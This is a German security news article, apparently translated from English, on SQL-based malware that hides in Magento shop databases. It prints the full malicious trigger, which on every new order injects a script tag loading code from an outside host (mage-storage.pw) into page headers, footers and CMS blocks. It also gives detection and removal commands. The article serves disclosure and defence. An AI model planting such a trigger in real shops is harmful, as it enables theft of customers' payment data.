Kundenlogin

Eine neue SQL-Malware visiert Magento-Onlineshops an

Sicherheitsexperten haben eine neue SQL-Malware entdeckt, welche Onlineshops basierend auf Magento anvisiert und den Schadcode in der Datenbank der Website versteckt.

Sicherheitsexperten haben einen neuen Stamm der Malware entdeckt, welche die Magento eCommerce-Plattform anvisiert. Die Besonderheit ist, dass dies die erste Malware ist, welche den Schadcode in der Datenbank der Webseite versteckt und komplett in SQL geschrieben ist.

Jedes Mal, wenn ein  Benutzer eine neue Bestellung durchführt, wird die Malware ausgelöst. Bevor die Magento-Plattform die Webseite überhaupt zusammenstellen kann, wird der „SQL-Auslöser“ ausgeführt.

Der Wissenschaftler Willem de Groot, welcher die SQL-Malware entdeckt bei Jeroen Boersma zuerst analysiert hat, erklärte, dass dies eine erhebliche Entwicklung der Bedrohungslandschaft ist.

„Der Auslöser wird bei jeder Neubestellung ausgeführt. Die Abfrage überprüft die Existenz der Malware im Header, Footer, Copyright und jeden CMS-Block. Falls fehlend, fügt es sich erneut hinzu.“ laut den Blog-Beitrag veröffentlicht von Willem de Groot.

„Diese Entdeckung macht es Eindeutig, dass wir eine neue Phase der Malware-Entwicklung beigetreten sind. Lediglich Datei-Scanning reicht nicht mehr aus. Malware-Erkennungsmaßnahmen sollten nun Datenbankanalysen enthalten.“

Die Malware kann benutzt werden, um Zahlungsinformationen der Benutzer der Magento eCommerce Webseiten zu stehlen.

Um die Existenz der SQL-Malware zu entdecken, müssen Administrators die Datenbank auf verdächtige SQL-Auslöser wie .admin, .js, script oder < (html tags) überprüfen.

echo ‚SHOW TRIGGERS‘ | n98-magerun db:console

Sobald der bösartige Auslöser entdeckt wurde, ist es möglich mit dem folgenden oder einen Ähnlichen Befehl diesen zu löschen:

echo „DROP TRIGGER <trigger_name>“ | n98-magerun db:console

Gemäß den Experten, fangen SQL-Malware Angriffe mit Brute-Force Angriffen gegen

/rss/catalog/notifystock/

einen sonst komplett gepatchten Shop an.

 

Folgend das Muster entdeckt bei Jeroen Boersma:

TRIGGER `after_insert_order`

AFTER INSERT ON `sales_flat_order` FOR EACH ROW

BEGIN

            UPDATE core_config_data

            SET value = IF(

                        value LIKE ‚%<script src=“https://mage-storage.pw/cdn/flexible-min.js“></script>%‘,

                        value,

                        CONCAT(value, ‚ <script src=“https://mage-storage.pw/cdn/flexible-min.js“></script>‘)

            )

            WHERE path=’design/head/includes‘

                        OR path=’design/footer/absolute_footer‘

                        OR path=’design/footer/copyright‘;\

 

            UPDATE cms_block

            SET content= IF(

                        content LIKE ‚%<script src=“https://mage-storage.pw/cdn/flexible-min.js“></script>%‘,

                        content,

                        CONCAT(content, ‚ <script src=“https://mage-storage.pw/cdn/flexible-min.js“></script>‘)

            );

END;

De Groot hat den Magereport und den Malware-Scanner aktualisiert, damit diese neue Art der Malware entdeckt wird.

Mit freundlicher Genehmigung aus dem englischen Original von Pierluigi Paganini

Schreibe einen Kommentar